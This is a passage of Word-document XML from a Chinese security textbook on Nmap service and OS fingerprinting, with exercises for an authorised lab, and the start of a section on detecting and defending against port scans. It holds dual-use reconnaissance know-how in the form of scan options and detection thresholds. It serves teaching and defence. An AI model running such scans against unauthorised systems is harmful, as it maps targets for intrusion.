      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蜜罐部署</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在非生产网段放置仿真系统，运行虚假的服务</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> banner </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指纹，吸引攻击者并收集其手法，同时将真实资产隔离保护（详见后续章节蜜罐技术）。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="100"/>
    <w:bookmarkStart w:id="101" w:name="习题-4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1059"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提取题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-sV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">选项与服务版本检测的直觉原理是什么？它与简单端口扫描（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-sS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）在获取信息上有何不同？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1059"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提取题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：为什么</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-O</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">选项需要目标存在至少一个开放</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口和一个关闭</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口？如果防火墙将所有非开放端口返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">filtered</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">状态，OS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测会如何受影响？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1059"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">迁移任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（需在授权环境操作）：分别用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-sV --version-intensity 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-sV --version-intensity 9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描你的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机，比较两者识别出的服务数量、扫描耗时和准确性差异。用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-O</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不加猜测与加上</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--osscan-guess</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对比</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测结果的差异。记录所观察到的结果，分析强度对实战的意义。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示与解答</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题关键：版本检测发送特定应用层探针并匹配响应特征，而端口扫描仅依赖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标志位判断端口是否开放，不交互应用数据。版本检测获取服务具体软件、版本和可能的额外信息（如主机名、操作系统），这些是漏洞利用的直接输入。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">题关键：OS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指纹依赖对开放端口和关闭端口的协议栈行为对比，例如对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包的反应、ISN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">抽样等。如果关闭端口不可达（被过滤），Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将缺少必要的特征，可能无法生成可靠指纹，或给出低置信度的猜测。防火墙策略应尽可能拒绝而非丢弃，以减少指纹信息。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">迁移任务提示：确保扫描在隔离实验网络中执行，记录扫描时间、发现的服务数、版本信息的详略。强度低可能仅识别到通用服务名称，强度高可识别到次要组件（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">版本）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">osscan-guess</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">有时会给出多个可能的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">OS，需结合其他信息进一步确认。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="101"/>
    <w:bookmarkStart w:id="102" w:name="小结-5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1060"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务版本指纹通过主动发送应用层探针并匹配响应特征，识别开放端口背后的具体服务软件与版本，为漏洞利用提供必要信息。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1060"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">操作系统指纹利用不同</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP/IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实现的行为差异，推断目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">家族和版本，同样受到中间设备影响。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1060"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NSE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">脚本引擎极大扩展了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的能力，可进行漏洞检测、认证破解、信息枚举等自动化任务，但必须严格授权使用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1060"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御者可通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> banner </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">伪装、TCP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">栈混淆、扫描检测和速率限制等手段降低情报泄露和扫描成功率。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="102"/>
    <w:bookmarkStart w:id="108" w:name="延伸阅读白名单-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读（白名单）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1061"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lyon, G. 《Nmap Network Scanning》: Nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">官方指南，深入讲解所有扫描选项、脚本开发与指纹原理。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1061"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sanders, C. 《Practical Packet Analysis》: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为主的分析技术，可帮助理解</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">产生的报文特征。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1061"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP Testing Guide: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">信息收集阶段的方法论，包含主动侦察与端口扫描的标准化流程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1061"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OffSec PWK/PEN-200 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">课程材料:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">渗透测试实战中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用场景与技巧。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1061"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bejtlich, R. 《The Practice of Network Security Monitoring》: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">讲解利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IDS/NSM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测扫描和指纹行为的策略与工具。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="103" w:name="扫描的检测与防御习题小结延伸"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描的检测与防御·习题·小结·延伸</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描行为在攻击链中处于“敲门试探”阶段：攻击者试图绘制目标的网络服务拓扑，而防御者则力图让这种试探变得代价高昂且易于暴露。本节从蓝队视角系统拆解端口扫描的检测、限速与欺骗反制，并以习题和小结收束本章。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="103"/>
    <w:bookmarkStart w:id="104" w:name="防御对照框端口扫描的检测与防御"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框：端口扫描的检测与防御</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者无论采用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">半开扫描、全连接扫描还是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描，其行为都会在网络层和传输层留下特征信息。蓝队的防御策略分层递进：从尽早感知扫描行为，到动态提高扫描成本，再到主动布设陷阱误导攻击者。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检测：识别扫描流量的统计与签名特征</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口扫描最根本的检测依据是“短时间内一个源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">向大量目标端口或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发送探测包”这一行为偏离正常通信模式。具体方法可分为基于流量统计的异常检测和基于签名的特征匹配。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1062"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">统计异常检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在防火墙或网络流量监控系统（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NetFlow/sFlow </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">采集器）上，统计每个源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在单位时间窗口内发出的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包数量、访问的不同目标端口数、连接建立失败率（SYN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后未完成三次握手，或收到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RST）。若某</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">秒内向同一主机发送了超过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 20 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包却无一完成握手，或向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 100 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个以上不同端口发送了探测，基本可判定为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描。UDP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描则表现为大量</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报文后跟</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ICMP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“端口不可达”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（Type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3, Code </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3）返回，但这种返回并非所有系统都产生，且速率常受限制，因此检测窗口需相应放宽。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1062"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">签名匹配</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：现代</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IDS/IPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系统（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Snort、Suricata）预置了扫描检测规则，可识别典型</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等工具在缺省参数下产生的报文特征。例如，SYN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会使用特定的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
